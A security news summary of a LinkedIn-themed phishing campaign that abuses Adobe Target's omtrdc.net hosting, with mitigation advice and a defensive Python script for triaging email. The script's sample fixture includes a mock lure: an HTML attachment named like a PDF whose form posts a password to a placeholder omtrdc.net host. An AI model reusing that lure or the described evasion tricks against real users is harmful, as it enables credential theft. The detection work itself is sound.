
LinkedIn-Themed Phishing Abuses Adobe’s A/B Testing Platform
Why It Matters
By exploiting a trusted Adobe service, attackers bypass many email‑security filters, increasing credential theft risk for enterprises and highlighting the need for stronger authentication and traffic monitoring.
Key Takeaways
- Phishers send LinkedIn‑style emails with PDF‑named HTML attachments.
- Fake login page auto‑fills email, then forwards credentials to attackers.
- Attack routes traffic through Adobe Target’s omtrdc.net domain.
- Using Adobe’s infrastructure masks malicious traffic as legitimate.
- MFA and direct site access recommended to mitigate such scams.
Pulse Analysis
Credential‑theft phishing continues to evolve, and this latest LinkedIn‑themed campaign illustrates how attackers weaponize reputable third‑party platforms. By embedding a malicious HTML file disguised as a PDF, the lure appears credible to busy professionals accustomed to receiving partnership proposals on LinkedIn. Once the attachment is opened, victims encounter a familiar login screen that silently forwards their passwords to a remote server, a classic man‑in‑the‑middle approach that leverages social engineering and brand trust to increase success rates.
The technical sophistication lies in the use of Adobe Target, a legitimate A/B testing service that hosts the phishing page on an omtrdc.net subdomain. This choice serves two purposes: it cloaks malicious traffic behind Adobe’s well‑known certificate, and it provides attackers with built‑in analytics to track which recipients click and submit credentials. Double extensions and heavily obfuscated HTML further evade static scanning tools, while pre‑filled email fields create a personalized feel that reduces user hesitation. Such abuse of trusted infrastructure makes detection harder for traditional email gateways and endpoint solutions.
Organizations can mitigate this threat by enforcing multi‑factor authentication for all critical accounts and training users to verify URLs rather than clicking links in unsolicited messages. Security teams should monitor outbound traffic to Adobe’s domains for anomalous patterns and consider web‑proxy policies that restrict direct access to A/B testing endpoints. Ultimately, a zero‑trust mindset—verifying every request regardless of source—combined with robust email filtering and user awareness will reduce the attack surface that campaigns like this exploit.
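For mail-triage teams, the lure described above (an HTML attachment named like a PDF, with a login form that references an omtrdc.net host) can be checked for at the gateway. The following is an added example, not code from the article or from any vendor; the `.pdf.html` file-name pattern, the sample message, the placeholder host and the `triage` function name are all assumptions made for illustration.

```python
import re
from email import message_from_string, policy

# Constructed sample message (not taken from the campaign); names and host are placeholders.
SAMPLE_EML = """\
From: "LinkedIn" <notify@example.test>
To: user@example.test
Subject: Partnership proposal
MIME-Version: 1.0
Content-Type: multipart/mixed; boundary="b1"

--b1
Content-Type: text/plain

Please review the attached proposal.
--b1
Content-Type: text/html; name="Proposal.pdf.html"
Content-Disposition: attachment; filename="Proposal.pdf.html"

<html><form action="https://placeholder.omtrdc.net/collect" method="post">
<input name="email" value="user@example.test"><input type="password" name="p">
</form></html>
--b1--
"""

# Assumed naming pattern: a document extension followed by an HTML extension.
DOC_THEN_HTML = re.compile(r"\.(pdf|docx?|xlsx?)\.(html?|shtml|xhtml)$", re.I)
HOST = re.compile(r"https?://([a-z0-9.-]+)", re.I)
WATCHED_SUFFIX = ".omtrdc.net"  # Adobe Target domain named in the article

def triage(raw_eml):
    """Return one finding per attachment that is named like a document but is HTML."""
    msg = message_from_string(raw_eml, policy=policy.default)
    findings = []
    for part in msg.iter_attachments():
        name = part.get_filename() or ""
        is_html = part.get_content_type() == "text/html"
        double_ext = bool(DOC_THEN_HTML.search(name))
        if not (double_ext or (is_html and name.lower().endswith(".pdf"))):
            continue  # file name and content type are consistent
        body = part.get_content() if part.get_content_maintype() == "text" else ""
        hosts = sorted({h.lower() for h in HOST.findall(body)
                        if h.lower().endswith(WATCHED_SUFFIX)})
        findings.append({"filename": name, "double_ext": double_ext,
                         "password_field": 'type="password"' in body.lower(),
                         "watched_hosts": hosts})
    return findings

if __name__ == "__main__":
    print(triage(SAMPLE_EML))
```

Because the article notes that the HTML is heavily obfuscated, the host and password-field checks may come back empty on real samples; the mismatch between file name and content type is the signal that does not depend on reading the markup.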